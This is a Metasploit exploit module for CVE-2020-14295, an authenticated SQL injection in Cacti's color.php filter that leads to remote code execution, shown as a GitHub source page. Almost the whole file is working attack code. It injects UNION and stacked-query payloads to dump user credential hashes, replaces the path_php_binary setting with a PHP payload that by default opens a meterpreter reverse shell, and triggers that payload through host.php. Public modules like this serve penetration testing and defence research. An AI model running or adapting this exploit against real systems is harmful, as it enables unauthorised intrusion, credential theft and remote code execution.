-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
cacti_filter_sqli_rce.rb
231 lines (204 loc) · 7.81 KB
/
cacti_filter_sqli_rce.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cacti color filter authenticated SQLi to RCE',
'Description' => %q{
This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter
variable within color.php to pull arbitrary values as well as conduct stacked queries. With stacked queries, the
path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload.
After calling the payload, the value is reset.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Leonardo Paiva', # edb, RCE
'Mayfly277' # original github, M4yFly on twitter SQLi
],
'References' => [
[ 'EDB', '49810' ],
[ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
[ 'CVE', '2020-14295' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
'Payload' => {
'BadChars' => "\x22\x27" # " '
},
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
},
'Targets' => [
[ 'Automatic Target', {}]
],
'DisclosureDate' => '2020-06-17',
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptString.new('TARGETURI', [ true, 'The URI of Cacti', '/cacti/']),
OptBool.new('CREDS', [ false, 'Dump cacti creds', true])
]
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
return CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
# cacti gives us the version in a JS variable
/var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body
if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')
vprint_good("Version Detected: #{version}")
return CheckCode::Appears
end
rescue ::Rex::ConnectionError
CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe?
end
CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
end
def exploit
login
# optionally grab the un/pass fields for all users. While we're already admin, cred stuffing...
if datastore['CREDS']
# https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png
print_status('Dumping creds')
res = inject("')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
return unless res
return if res.nil?
return if res.body.nil?
res.body.split.each do |cred|
/"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred
next unless hash
next if hash == 'hex' # header row
print_good("Username: #{username}, Password Hash: #{hash}")
report_cred(
username: username,
password: hash,
private_type: :nonreplayable_hash
)
end
end
print_status('Backing-up path_php_binary value')
res = inject("')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")
# return value:
# "name","hex"
# "","FEFCFF"
# "/usr/bin/php","3"
if res && !res.body.nil?
php_binary = res.body.split.last # check to make sure we have something first before proceeding
fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") if php_binary.nil?
php_binary = php_binary.split(',')[0].gsub('"', '') # take last entry on page, and split to value
end
fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
print_good("path_php_binary: #{php_binary}")
print_status('Uploading payload')
begin
pload = "#{php_binary} -r '#{payload.encoded}' #"
pload = Rex::Text.uri_encode(pload.gsub("'", "\\\\'"))
inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
print_good('Executing Payload')
trigger
ensure
resetsqli(php_binary)
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
def login
cookie_jar.clear
print_status('Grabbing CSRF')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'keep_cookies' => true
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
/name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf
print_good("CSRF: #{csrf}")
print_status('Attempting login')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' => {
'login_username' => datastore['USERNAME'],
'login_password' => datastore['PASSWORD'],
'action' => 'login',
'__csrf_magic' => csrf
}
)
if res && res.code != 302
fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})")
end
res
end
def inject(content)
res = send_request_cgi(
'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-",
'keep_cookies' => true
)
if res && res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Injection Failed (response code: #{res.code})")
end
res
end
def trigger
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'host.php'),
'keep_cookies' => true,
'vars_get' => {
'action' => 'reindex'
}
)
end
def resetsqli(php_binary)
print_status('Cleaning up environment')
login # any subsequent requests with our cookie will fail, so we'll need to login a 2nd time to reset the database value correctly
print_status('Resetting DB Value')
inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{php_binary}'+where+name='path_php_binary';")
end
def report_cred(opts)
service_data = {
address: datastore['RHOST'],
port: datastore['RPORT'],
service_name: 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:username],
private_data: opts[:password],
private_type: opts[:private_type],
jtr_format: Metasploit::Framework::Hashes.identify_hash(opts[:password])
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: ''
}.merge(service_data)
create_credential_login(login_data)
end
end